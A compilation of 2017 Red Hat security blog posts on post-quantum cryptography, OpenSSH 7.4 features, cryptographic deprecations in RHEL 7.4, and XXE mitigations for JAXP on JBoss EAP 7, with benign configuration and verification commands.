    For symmetric ciphers, the story is slightly different. It has been proven that applying Grover's algorithm to break a symmetric (secret key) algorithm with key length of n bits by brute force requires time equal to roughly 2^(n/2) invocations of the underlying cryptographic algorithm, compared with roughly 2^n in the classical case, meaning that the strength of symmetric key lengths are effectively halved: AES-256 would have the same security against an attack using Grover's algorithm that AES-128 has against classical brute-force search. Therefore the situation with symmetric ciphers is stronger than the one with public key crypto systems.

    Hashes are also affected in the same way symmetric algorithms are: Grover's algorithm requires twice the hash size (as compared to the current safe values) for the same cryptographic security.

    Therefore, we need new algorithms which are resistant to quantum computation. Currently there are five families of proposals under study:

    Lattice-based cryptography

    A lattice is the symmetry group of discrete translational symmetry in n directions. This approach includes cryptographic systems such as Learning with Errors, Ring-Learning with Errors (Ring-LWE), the Ring Learning with Errors Key Exchange and the Ring Learning with Errors Signature. Some of these schemes (like NTRU encryption) have been studied for many years without any known feasible attack vectors and hold great promise. On the other hand, there is no supporting proof of security for NTRU against quantum computers.

    Lattice-based cryptography is interesting because it allows the use of traditional short key sizes to provide the same level of security. No short-key system has a proof of hardness (long-key versions do). The possibility exists that a quantum algorithm could solve the lattice problem, and the short-key systems may be the most vulnerable.

    Multivariate cryptography

    Multivariate cryptography includes cryptographic systems such as the Rainbow scheme which is based on the difficulty of solving systems of multivariate equations. Multivariate signature schemes like Rainbow could provide the basis for a quantum secure digital signature, though various attempts to build secure multivariate equation encryption schemes have failed.

    Several practical key-size versions have been proposed and broken. The EU has standardized on a few; unfortunately, those have all been broken (classically).

    Hash-based cryptography

    Hash-based digital signatures were invented in the late 1970s by Ralph Merkle and have been studied ever since as an interesting alternative to number-theoretic digital signatures like RSA and DSA. The primary drawback of any hash-based public key is a limit on the number of signatures that can be signed using the corresponding set of private keys. This limitation reduced interest in these signatures until it was revived by the desire for cryptography that resists attack by quantum computers. Schemes that allow an unlimited number of signatures (called 'stateless') have now been proposed.

    Hash-based systems are provably secure as long as hashes are not invertible. The primary issue with hash-based systems is signature size (signatures are quite large). They also only provide signatures, not key exchange.

    Code-based cryptography

    Code-based cryptography includes cryptographic systems which rely on error-correcting codes. The original McEliece signature using random Goppa codes has withstood scrutiny for over 30 years. The Post Quantum Cryptography Study Group sponsored by the European Commission has recommended the McEliece public key encryption system as a candidate for long term protection against attacks by quantum computers. The downside, however, is that code based cryptography has large key sizes.

    Supersingular elliptic curve isogeny cryptography

    This cryptographic system relies on the properties of supersingular elliptic curves to create a Diffie-Hellman replacement with forward secrecy. Because it works much like existing Diffie-Hellman implementations, it offers forward secrecy, which is viewed as important both to prevent mass surveillance by governments and to protect against the compromise of long-term keys through failures.

    Implementations

    Since this is a dynamic field, with cycles of algorithms being defined and broken, there are no standardized solutions. NIST's crypto competition provides a good chance to develop new primitives to power software for the next decades. It is worth mentioning, however, that Google Chrome for some time implemented the NewHope algorithm, which is part of the Ring Learning-with-Errors (RLWE) family. This experiment has since concluded.

    In conclusion, which post-quantum cryptographic scheme is ultimately adopted will depend on how quickly quantum computers become viable and available, at minimum to state agencies if not the general public.

    Posted: 2017-07-26T13:30:00+00:00
  • What is new in OpenSSH 7.4 (in RHEL 7.4)?

    Authored by: Jakub Jelen

    Red Hat Enterprise Linux 7 (RHEL 7) so far has been providing iterations of OpenSSH 6.6.1p1, first released in 2014. While we've kept it updated against vulnerabilities, many things have changed both in security requirements and features provided by the latest OpenSSH. Therefore, OpenSSH has now been updated to the recently released OpenSSH 7.4p1, which brings many new features and security enhancements. For the complete set of changes and bugfixes, please refer to the upstream release notes.

    New features

    This OpenSSH client and server rebase brings on many new and useful features. The most prominent ones are described below.

    Host Key Rotation

    Setting up a new system accessed by SSH, or generating new server host keys which satisfy new security requirements, was a complicated task in the past. New keys had to be distributed to all users and swapped in the server configuration atomically, otherwise users would see scary warnings about a possible MITM attack. This update addresses that problem by presenting all the host keys to connecting clients, allowing for a smooth transition between old and new keys.

    This functionality is controlled by the client configuration option UpdateHostKeys. When the value is set to yes or ask, the client will request all the public keys present on the server (with OpenSSH 6.8 and newer) and store them in the known_hosts file. These keys are transferred using the encrypted channel and the client verifies the signatures from the server, therefore this operation does not require explicit user verification, assuming the previously used host key is already trusted.

    $ ssh -o UpdateHostKeys=ask localhost
    Learned new hostkey: RSA SHA256:5oa3j5qave0Tz2ScovK084zqtgsGy0PeZfL8qc7NMtk
    Learned new hostkey: ED25519 SHA256:iZG0mDh0JZaPrQ+weGEEyjfN+qL9EDRxrffhqzoAFdo
    Accept updated hostkeys? (yes/no): yes
    Last login: Wed May  3 16:29:38 2017 from ::1
    

    New SHA256 Fingerprint Format

    As can be seen in the previous paragraph, OpenSSH has moved away from MD5-based fingerprints to SHA256 ones. The new hash is longer and therefore is represented in base64 format instead of colon-separated hexadecimal pairs. The fingerprint format can be specified using the FingerprintHash configuration option in ssh_config, or with the -E switch to ssh-keygen. In most places both hashes (SHA256 and MD5) are shown by default for backward compatibility:

    $ ssh example.org
    The authenticity of host 'example.org (192.168.0.7)' can't be established.
    ECDSA key fingerprint is SHA256:kmtPlIwHZ4B68g6/eRbDTgC2GD0QnmrjjA0MjOB3/HY.
    ECDSA key fingerprint is MD5:57:01:87:16:7a:a8:24:60:db:9e:05:3f:a0:78:aa:69.
    Are you sure you want to continue connecting (yes/no)? yes
    

    Other tools require an explicit command line option to provide the old fingerprint format:

    $ ssh-keygen -l -f /etc/ssh/ssh_host_ecdsa_key.pub
    256 SHA256:kmtPlIwHZ4B68g6/eRbDTgC2GD0QnmrjjA0MjOB3/HY no comment (ECDSA)
    $ ssh-keygen -l -E md5 -f /etc/ssh/ssh_host_ecdsa_key.pub
    256 MD5:57:01:87:16:7a:a8:24:60:db:9e:05:3f:a0:78:aa:69 no comment (ECDSA)
    

    Simplified connection using intermediate hosts

    There is a new configuration option ProxyJump, and command line switch -J, which significantly simplifies the configuration and connection to servers in private networks behind a jump box.

    In the past, there was only the ProxyCommand option, which covered many use cases though it was complex to use. It required a configuration as follows:

    Host proxy2
      ProxyCommand ssh -W %h:%p -p 2222 user@proxy
    Host example.com
      ProxyCommand ssh -W %h:%p user2@proxy2
    

    The new ProxyJump configuration syntax is simpler, and makes it very easy to write even longer chains of connections. For example:

    Host example.com
      ProxyJump user@proxy:2222,user2@proxy2
    

    The same as above can also be specified ad hoc on the command line:

    $ ssh -J user@proxy:2222,user2@proxy2 example.com
    

    UNIX domain socket forwarding

    Previously, OpenSSH allowed only TCP ports to be forwarded in SSH channels. Many applications today use UNIX domain sockets instead, so OpenSSH has implemented support for them. You can forward a remote socket to a local one, the other way round, or even a UNIX domain socket to a TCP socket, and it is no more complicated than standard TCP forwarding. Just replace hostname:port values with paths to UNIX domain sockets.

    For example, the remote MariaDB socket can be forwarded to the local machine and allow secure connection to this database:

    $ ssh -L /tmp/mysql.sock:/var/lib/mysql/mysql.sock -fNT mysql.example.com
    $ mysql -S /tmp/mysql.sock
    

    New default cipher ChaCha20-Poly1305

    Although the ChaCha20-Poly1305 cipher was available in older OpenSSH versions, it is now prioritized over other ciphers since it is considered mature enough and has reasonable performance. It is an Authenticated Encryption with Associated Data (AEAD) cipher which combines the MAC algorithm (Poly1305) with the cipher, similar to AES-GCM. The cipher is automatically used when connecting to RHEL 7 servers1, but connections to other servers will still use other supported ciphers.
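
    Which cipher was actually negotiated can be checked from the verbose client output (the exact wording of the debug line differs between OpenSSH versions):

    $ ssh -v example.com 2>&1 | grep 'cipher:'
    debug1: kex: server->client cipher: chacha20-poly1305@openssh.com MAC: <implicit> compression: none
    debug1: kex: client->server cipher: chacha20-poly1305@openssh.com MAC: <implicit> compression: none
    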

    Improvement in ssh-agent connection

    So far, identity management in ssh-agent (e.g., adding SSH keys to the agent) has been handled by the ssh-add tool, which must be used prior to connecting to a remote server using ssh.

    It can come in handy to add and decrypt the required keys on demand while connecting to a remote server. For that, the AddKeysToAgent option in ssh_config will either add all the used keys automatically or prompt to add new keys as they are used. In combination with the -t switch of ssh-agent, which specifies a key's lifetime, it is a simple and secure alternative to storing your keys in ssh-agent indefinitely.

    Furthermore, the ssh-agent connection socket can now be specified in ssh_config using IdentityAgent, which removes much of the struggle of starting the ssh-agent properly and passing its environment variables to existing processes. For example, the following snippet in ~/.bashrc will start the agent, and added keys will have a default lifetime of 10 hours:

    # Start a per-user ssh-agent bound to a fixed socket path, with a 10-hour default key lifetime
    SOCK=/tmp/username/ssh-agent.sock
    SOCK_DIR=$(dirname "$SOCK")
    [ -d "$SOCK_DIR" ] || mkdir -m 700 "$SOCK_DIR"
    # -S tests for a socket, so the agent is only started when it is not already running
    [ -S "$SOCK" ] || eval "$(ssh-agent -a "$SOCK" -t 10h)"
    

    The corresponding configuration in ~/.ssh/config will contain the following lines:

    IdentityAgent /tmp/username/ssh-agent.sock
    AddKeysToAgent yes
    

    Security-related changes

    Over the years, there have been many changes upstream regarding security. With this update we are trying to preserve backward compatibility while removing (potentially) broken algorithms or options that were still available in the OpenSSH previously shipped in Red Hat Enterprise Linux 7.

    Not using SHA-1 for signatures by default

    The original SSH protocol in RFC 4253 only defines RSA authentication signatures using the SHA-1 hash algorithm. As SHA-1 is no longer considered safe, the protocol has been extended in draft-ietf-curdle-rsa-sha2 to allow SHA-2 algorithms along with RSA signatures. This extension is negotiated automatically when connecting to servers running OpenSSH 7.2 and newer. It can be verified that the new hash algorithm is used from the debug log as follows:

    debug2: KEX algorithms: [...],ext-info-c
    [...]
    debug3: receive packet: type 7
    debug1: SSH2_MSG_EXT_INFO received
    debug1: kex_input_ext_info: server-sig-algs=<rsa-sha2-256,rsa-sha2-512>
    [...]
    debug1: Server accepts key: pkalg rsa-sha2-512 blen 279
    

    SSH-1 server removed

    The obsolete SSH-1 server code was removed from OpenSSH. The complete announcement can be found in this knowledgebase article.

    As with previous RHEL 7 releases, connections from clients to existing SSH-1 servers are still possible, and require the use of the -1 switch or the following configuration:

    Host legacy.example.com
      Protocol 2,1
    

    Seccomp filter for privilege separation sandbox

    The OpenSSH server in RHEL is now built with a seccomp filter sandbox, which is enabled by default. In previous versions, the rlimit method was used to limit the resources available to a network-facing process. The seccomp filter allows only a very limited list of system calls from this process, reducing the impact of a compromise. That sandbox can be turned off in /etc/ssh/sshd_config by setting:

    UsePrivilegeSeparation yes
    

    Removed support for pre-authentication compression

    Historically, compression in network protocols was recommended in order to increase encryption performance and reduce the amount of data available to an adversary.

    Given statistical attacks and the fact that compression in combination with encryption increases code complexity and attack surface, enabling compression with encryption today is mostly seen as a security liability, underlined by issues such as CVE-2016-10012.

    The compression option has been disabled in the OpenSSH server for more than 10 years, and in this release the pre-authentication compression code is completely removed.

    Deprecation of insecure algorithms

    Following up on the Deprecation of Insecure Algorithms in RHEL 6.9, legacy algorithms that potentially pose a more serious threat to deployments are being disabled. In RHEL 7.4, that affects the RC4 ciphers, as well as MD5, RIPE-MD160, and truncated SHA-1 MACs, on both the client and server side. The ciphers Blowfish, Cast128, and 3DES were removed from the default set of algorithms accepted by the client but are still supported in the server.

    If these algorithms are still needed for interoperability with legacy servers or clients, they can be enabled on a per-host basis as described in the upstream documentation. The following example describes how to enable 3des-cbc cipher in a client:

    Host legacy.example.org
      Ciphers +3des-cbc
    

    Another example, enabling hmac-md5 in a server for the legacy.example.org client:

    Match Host legacy.example.org
      MACs +hmac-md5
    

    Conclusion

    The new OpenSSH in RHEL 7.4 comes with many bug fixes and features that might affect your everyday work and that are worth using. Engineering has worked very hard to maintain backward compatibility with previous versions while improving the security defaults at the same time. If you feel any regressions have been missed, please contact Red Hat Support.


    1. Not when the system is in FIPS140-2 certified mode. 

    Posted: 2017-07-12T00:00:00+00:00
  • Enhancing the security of the OS with cryptography changes in Red Hat Enterprise Linux 7.4

    Authored by: Nikos Mavrogian...

    Today we see more and more attacks on operating systems taking advantage of various technologies, including obsolete cryptographic algorithms and protocols. As such, it is important for an operating system not only to carefully evaluate the new technologies that get introduced, but also to provide a process for phasing out technologies that are no longer relevant. Technologies with no practical use today increase the attack surface of the operating system and, more specifically in the cryptography field, introduce risks such as untrustworthy communication channels when algorithms and protocols are used past their useful lifetime.

    That risk is not confined to the users of the obsolete technologies; as DROWN and other cross-protocol attacks have demonstrated, it is sufficient for a server to merely enable a legacy protocol in parallel with the latest one for all of its users to be vulnerable. Furthermore, the recent cryptographic advances against the SHA-1 algorithm used for digital signatures demonstrate the need for algorithm agility in modern infrastructures. SHA-1 was an integral part of the Internet and of private Public Key Infrastructures; despite that, we must envision a not-so-distant future with systems that no longer rely on SHA-1 for any cryptographic purpose.

    To address the challenges above, with the release of Red Hat Enterprise Linux (RHEL) 7.4 beta we are introducing several cryptographic updates to RHEL, along with a multitude of new features and enhancements. We continue and extend the protocol deprecation effort started in RHEL 6.9, improve access to the kernel-provided PRNG with the getrandom system call, and ensure that HTTP/2-supporting technologies, such as ALPN in TLS and DTLS 1.2, are supported universally in our operating system. Python applications are also made secure by default by enabling certificate verification in TLS sessions. We are also proud to bring the OpenSC smart card drivers into RHEL 7.4, incorporating our in-house developed drivers and merging our work with the OpenSC project community efforts. At the same time, the introduced crypto changes ensure that RHEL 7.4 meets the rigorous security certification requirements for FIPS 140-2 cryptographic modules.

    Removal of SSH 1.0, SSL 2.0 protocols and EXPORT cipher suites

    For reasons underlined in our deprecation of insecure algorithms blog post, that is, to protect applications running in RHEL from severe attacks utilizing obsolete cryptographic protocols and algorithms, the SSH 1.0 and SSL 2.0 protocols, as well as the cipher suites marked as ‘export’, will no longer be included in our supported cryptographic components. The SSH 1.0 protocol is removed from the server side of the OpenSSH component, while support for it will remain on the client side (already disabled by default) to allow communication with legacy equipment. The SSL 2.0 protocol as well as the TLS ‘export’ cipher suites are removed unconditionally from the GnuTLS, NSS, and OpenSSL crypto components. Furthermore, the Diffie-Hellman key exchange is restricted to values considered acceptable for today’s cryptographic protocols.

    Note also that, through our review of accepted legacy hashes in the operating system, we discovered that the OpenSSL component enables obsolete hashes for digital signatures, such as SHA-0, MD5, and MD4. Since these hashes have no practical use today, and to reduce the risk of relying on legacy algorithms, we have decided to deviate from the upstream OpenSSL settings and disable these hashes by default for all OpenSSL applications. This change is reversible (see the release notes). Note that this issue was discussed with the upstream OpenSSL developers and, although the behavior is known to them, it is kept for backwards compatibility.

    Below is a summary of the deprecated protocols and algorithms.

    • SSL 2.0 protocol: The shipped TLS libraries will no longer include support for the SSL 2.0 protocol. Reversible: No.
    • Export TLS ciphersuites: The shipped TLS libraries will no longer include support for Export TLS ciphersuites. Reversible: No.
    • SSH 1.0 protocol: The shipped OpenSSH server will no longer include support for the SSH 1.0 protocol. Reversible: No.
    • TLS Diffie-Hellman key exchange: Only parameters larger than 1024 bits will be accepted by default. Reversible: Conditionally (information will be provided in the release notes).
    • Insecure hashes for digital signatures in OpenSSL: The MD5, MD4, and SHA-0 algorithms will not be enabled by default for TLS sessions or certificate verification in OpenSSL. Reversible: Yes; administrators can revert this setting system-wide (information will be provided in the release notes).
    • RC4 algorithm: The algorithm will no longer be enabled by default for OpenSSH sessions. Reversible: Yes; administrators can revert this setting system-wide (information will be provided in the release notes).
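
    To review which algorithms the OpenSSH binaries on a system are built with, the client's query option can be used as shown below. Note that this lists everything the binaries support, including algorithms that are disabled by default, so it is a quick way to check whether a legacy algorithm is still available for explicit per-host enablement:

    $ ssh -Q cipher
    $ ssh -Q mac
    $ ssh -Q kex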

    Phasing out of SHA-1

    SHA-1 was published in 1995 and is still in use today in a variety of applications, including but not limited to the web PKI. In particular, its primary use case is digital signatures on data, certificates, and OCSP responses. However, there are several known weaknesses in this hash, and a collision attack was recently demonstrated; combined with the experience gained from the MD5 hash attacks, this is an indication that a forged-certificate attack may not be far in the future. For that reason, we have ensured that all our cryptographic tools1 which deal with digital signatures will no longer use SHA-1 as the default hash function, but will instead switch to SHA2-256, which, among the stronger hashes, provides the best compatibility with older clients.

    In addition, to further strengthen the resistance of RHEL to such cryptographic attacks, we have lifted the OpenSSH server and client limitation to SHA-1 for digital signatures, enabling support for SHA2-256 digital signatures.

    We do not yet plan to disable SHA-1 system-wide in RHEL 7, as a significant amount of infrastructure still depends on it and disabling it would severely disrupt operations. Nonetheless, we recommend that software engineers working on RHEL no longer rely on SHA-1 for cryptographic purposes, and that system administrators verify that they no longer use certificates, OCSP stapled responses, or any other cryptographic structures with SHA-1-based signatures.

    To verify whether a certificate, OCSP response, or CRL uses the SHA-1 hash algorithm for its signature, you may use the following commands.

    • To check whether a certificate in FILENAME uses SHA-1: openssl x509 -in FILENAME -text -noout | grep -i 'Signature.*sha1'
    • To check whether an OCSP response in FILENAME uses SHA-1: openssl ocsp -resp_text -respin FILENAME -noverify | grep -i 'Signature.*sha1'
    • To check whether a CRL in FILENAME uses SHA-1: openssl crl -in FILENAME -text -noout | grep -i 'Signature.*sha1'
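
    If the checks above reveal SHA-1 signatures under your control, for example on an internal self-signed certificate, re-issuing with a SHA-2 hash is straightforward. The following is a minimal illustration only; the file names and subject are placeholders:

    $ openssl req -x509 -newkey rsa:2048 -sha256 -days 365 -nodes \
        -keyout key.pem -out cert.pem -subj '/CN=internal.example.com'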

    HTTP/2 related updates

    Modern internet applications strive for low latency and good responsiveness, and the HTTP/2 protocol is a major driver of that effort. With the introduction of OpenSSL 1.0.2 into RHEL 7.4, we complete support for Application-Layer Protocol Negotiation (ALPN) across our base crypto stack. This TLS protocol extension enables applications to reduce TLS handshake round-trips by negotiating the application protocol and its version during the handshake. In practice it is used by applications to signal their HTTP/2 support, eliminating the need for additional round-trips after the TLS connection is established. Combined with other kernel features such as TCP Fast Open, this can further fine-tune TLS session establishment.
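
    To observe ALPN in action against an HTTP/2-capable server, the updated openssl s_client can request a protocol during the handshake. This is an illustrative check; www.example.com is a placeholder and the exact output line depends on the OpenSSL version:

    $ echo | openssl s_client -connect www.example.com:443 -alpn h2 2>/dev/null | grep -i 'ALPN'
    ALPN protocol: h2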

    DTLS 1.2 for all applications

    Additionally, the introduction of OpenSSL 1.0.2 brings support for the Datagram TLS 1.2 (DTLS) protocol in OpenSSL applications, completing that support throughout the TLS stacks on the operating system. That support ensures that applications using the DTLS protocol can take advantage of the secure authenticated encryption (AEAD) cipher suites, eliminating the reliance on CBC cipher suites, which are known to be problematic for DTLS.
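
    For a quick local test of DTLS 1.2, openssl's test server and client can be pointed at each other. This is a minimal sketch; the key, certificate, and port are placeholders:

    $ openssl s_server -dtls1_2 -key key.pem -cert cert.pem -accept 4433
    $ openssl s_client -dtls1_2 -connect 127.0.0.1:4433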

    Crypto-related Python-language changes

    The upstream version of Python 2.7.9 enabled SSL/TLS certificate verification in Python’s standard library modules that provide HTTP client functionality, such as urllib, httplib, and xmlrpclib. Prior to this change, no certificate verification was performed by default, making Python applications vulnerable to certain classes of attacks in SSL and TLS connections. This was a well-known issue for a long time, and several applications worked around it by implementing their own certificate checks. Despite these workarounds, in order to ensure that all Python applications are secure by default and follow a consistent certificate-validation process, Red Hat Enterprise Linux 7.4 incorporates the upstream change and enables certificate verification by default in TLS sessions for all applications.
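
    The practical effect is that a connection to a host presenting an untrusted certificate now fails instead of silently succeeding. A quick illustration follows; the host name is a placeholder and the exact exception text varies by Python version:

    $ python -c 'import urllib2; urllib2.urlopen("https://self-signed.example.com/")'
    ...
    urllib2.URLError: <urlopen error [SSL: CERTIFICATE_VERIFY_FAILED] certificate verify failed>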

    Crypto-related kernel changes

    Despite the fact that the Linux kernel was one of the first to provide interfaces for cryptographically-secure pseudo-random data via the /dev/*random devices, these interfaces show their age today. /dev/random is a device which, when read, provides random data to the extent allowed by an internal entropy estimator; that is, the device blocks when not enough random events, gathered from internal kernel entropy sources such as interrupts and other hardware activity, have been accumulated. Because of that estimator, the /dev/random interface may seem initially tempting to use. In practice, however, /dev/random cannot be relied upon: it requires a large number of random events to be accumulated to provide a few bytes of random data, and any use of it during boot time risks blocking the system indefinitely.

    On the other hand, the /dev/urandom device provides access to the same random generator, but it never blocks and does not require new random events to be accumulated before providing output. That is expected, given that modern random generators, when sufficiently seeded, can provide an enormous amount of output before being considered broken in an information-theoretic sense. Unfortunately, /dev/urandom suffers from a design flaw: when used early in the boot process, prior to the initialization of the kernel random number generator, it will still output data. How random that data is depends on the system, although on modern platforms which provide a CPU-based random generator this is less of an issue.

    To eliminate such risks, RHEL 7.4 introduces the getrandom() system call, which combines the best of the existing interfaces: it provides non-blocking access to the kernel CPRNG, while blocking until the kernel random generator has been initialized. Furthermore, it requires no file descriptor to be carried around by applications and libraries. The new system call is available through the syscall(2) interface.

    Smart card related changes

    For a long time, RHEL has provided the CoolKey smart card driver for applications to access smart cards through the PKCS#11 API. This driver was limited to the smart cards that we focus on for our operating system, that is, PIV, CAC, PKCS#15-compliant, and CoolKey-applet cards. Over the years, however, the community-based OpenSC project, which provides an alternative driver, has managed to support the majority of available smart cards, offers a solid code base implementing the industry-standard PKCS#11 API, and has already been included in Fedora for many years. Most importantly, the project also serves as a healthy example of a community-driven project, with collaborating engineers from diverse backgrounds and technologies.

    With that in mind, we have proceeded to merge our projects by introducing the missing drivers and features into OpenSC, and by releasing our extensive test suite for smart card support. The outcome of this effort is made available in RHEL 7.4, where the OpenSC component will serve in parallel with the CoolKey component. The latter will remain supported for the lifetime of RHEL 7; however, new hardware enablement will only be available in the OpenSC component.

    Future changes

    During the lifetime of Red Hat Enterprise Linux 7 we plan to deprecate and disable by default the SSL 3.0 protocol and the RC4 cipher in TLS and Kerberos system-wide. Note that we do not plan to remove support for these algorithms, but to disable them for applications which do not explicitly request them.

    • SSL 3.0 protocol: The shipped TLS libraries will no longer enable support for the SSL 3.0 protocol. This protocol has been superseded by TLS 1.0 for almost two decades, and there is a multitude of attacks against it. Reversible: By explicitly enabling the protocol in applications that require it.
    • RC4: The shipped TLS libraries will no longer enable the RC4-based ciphersuites by default. Cryptographic advances have shown that accidental use of this algorithm puts application data secrecy at risk. Reversible: By explicitly enabling the ciphersuites in applications that require them.

    Concluding remarks

    All of the above changes ensure that Red Hat Enterprise Linux 7 remains a leader in the adoption of new technologies with security built into the OS. Red Hat Enterprise Linux not only carefully evaluates and incorporates new technologies, but also regularly phases out technologies that are no longer relevant and pose a security risk. Specifically, HTTP/2-supporting protocols are made available in all of our cryptographic back-ends. We also align with the community on smart card development, not only by bringing our improvements to the OpenSC project, but by introducing it as a fully supported component in Red Hat Enterprise Linux 7. Furthermore, with the introduction of Datagram TLS 1.2 in OpenSSL, and the updates in OpenSSH to support cryptographic hashes other than SHA-1, we ensure that Red Hat Enterprise Linux 7 applications utilize cryptographic algorithms that can resist today’s threats.

    On the other hand, we reduce the attack surface of the operating system by removing support for SSH 1.0, SSL 2.0, and the TLS ‘export’ cipher suites. That move reduces the risk of successful future attacks, at the cost of removing protocols which are today considered either too risky to use or plainly insecure.

    The removal of the previously mentioned protocols is an exceptional move, made because we are convinced that these protocols are primarily used to attack misconfigured systems rather than for real-world use cases. For any future changes, such as the disablement of SSL 3.0 or RC4, we would like to assure you that they will be made in a way that allows systems to revert to the previous behavior when required by local policy.

    All of these changes ensure Red Hat Enterprise Linux keeps pace with the reality of the security landscape around us, and improves its strong security foundation.


    1. The above applies to software from the GnuTLS, NSS, and OpenSSL crypto components. 

    Posted: 2017-06-16T00:00:00+00:00
  • Secure XML Processing with JAXP on EAP 7

    Authored by: Jason Shepherd

    The Java Development Kit (JDK) version 8 provides the Java API for XML Processing (JAXP). Developers using JAXP on Red Hat JBoss Enterprise Application Platform (EAP) 7 need to be aware that Red Hat JBoss EAP 7 ships its own implementation, with some differences from JDK 8 that are covered in this article.

    Background

    There have been three issues raised in the month of May 2017 relating to JAXP on Red Hat JBoss EAP 7: CVE-2017-7464, CVE-2017-7465, and CVE-2017-7503. All of the issues are XML External Entity (XXE) vulnerabilities, which have affected Java since 2002. XXE is a type of attack that affects weakly configured XML parsers. A successful attack occurs when XML input contains external entities. Those external entities can do things such as access local network resources, or read local files.

    Red Hat maintains its own fork of Xalan used for XML processing. This was done to avoid certain limitations of the upstream code in a multi-classloader, modular environment such as Red Hat JBoss EAP. The JDK maintains its own fork as well, and has made some security improvements which have not been contributed back to the upstream Xalan project. For example, a Billion Laughs-style entity expansion attack is thwarted on OpenJDK 1.8.0_73 by changes that result in an error message such as:

    JAXP00010001: The parser has encountered more than "64000" entity expansions in this document; this is the limit imposed by the JDK.
    

    It's important to remember that you only need to be concerned about vulnerabilities affecting XML processing if you don't trust the XML content you are parsing. One way to add trust to XML content is by adding authentication to network-accessible endpoints which are accepting XML content.

    The current situation

    All of the vulnerabilities relate to JAXP and not to the web services specifications JAX-WS and JAX-RS, which are implemented on Red Hat JBoss EAP by Apache CXF and Resteasy respectively. One of the main goals for developers on Red Hat JBoss EAP is to build web services, which is why the distinction is made. If you're doing web service development on Red Hat JBoss EAP 7, these issues will mostly not apply; they affect the direct use of JAXP for XML processing.

    There is one place where web services overlap with JAXP and where user code could potentially be affected by one of these vulnerabilities. Section 4.2.4 of the JAX-RS 2.0 specification mandates that EAP 7 must provide MessageBodyReader and MessageBodyWriter implementations for javax.xml.transform.Source. These are used for processing JAX-RS requests with application/*+xml media types. A common way of unmarshalling a javax.xml.transform.Source is to use a TransformerFactory, as demonstrated here:

    // Transform the incoming javax.xml.transform.Source (mySource) into a String
    TransformerFactory factory = TransformerFactory.newInstance();
    Transformer transformer = factory.newTransformer();
    StreamResult xmlOutput = new StreamResult(new StringWriter());
    transformer.transform(mySource, xmlOutput);
    resultXmlStr = xmlOutput.getWriter().toString();
    

    Where mySource is of type javax.xml.transform.Source.

    In this situation, there is one outstanding issue, CVE-2017-7503, which is yet to be resolved on EAP 7.0.5. While this is one place where Red Hat JBoss EAP encourages the use of JAXP, the JAX-RS implementation (Resteasy) is not directly affected, because it does not itself process the javax.xml.transform.Source as demonstrated above; it only provides the javax.xml.transform.Source for the developer to transform in their web application code.

    CVE-2017-7503 affects the processing of XML content from an untrusted source using a javax.xml.transform.TransformerFactory. The only safe way to process untrusted XML content with a TransformerFactory is to use the StAX API. StAX is safe on EAP 7.0.x because the XML content is not read in its entirety in order to parse it. As a developer using StAX, you decide which XML stream events you want to react to, so XXE control constructs won't be processed automatically by the parser.

    For CVE-2017-7464 and CVE-2017-7465 there are mitigations from the OWASP XXE Prevention Cheat Sheet. The specific mitigations for these issues are as follows:

    CVE-2017-7464

    SAXParserFactory parserFactory = SAXParserFactory.newInstance();
    parserFactory.setFeature(XMLConstants.FEATURE_SECURE_PROCESSING, true);
    parserFactory.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
    

    CVE-2017-7465

    TransformerFactory factory = TransformerFactory.newInstance();
    factory.setFeature(javax.xml.XMLConstants.FEATURE_SECURE_PROCESSING, true);
    

    How could it be fixed?

    On Red Hat JBoss EAP 7.0.x, CVE-2017-7503 is yet to be resolved. In contrast, CVE-2017-7464 and CVE-2017-7465 already have mitigations in place, so a fix may not be provided in the 7.0.x stream.

    Ideally, the JAXP implementations would be removed entirely from Red Hat JBoss EAP 7, which would then rely solely on the ones provided by the JDK itself. Removing Xalan from Red Hat JBoss EAP is still being investigated.

    A compromise might be to maintain a fork of the JAXP libraries and enable the secure options recommended by OWASP by default in a future major release of Red Hat JBoss EAP 7.

    Posted: 2017-06-01T13:30:00+00:00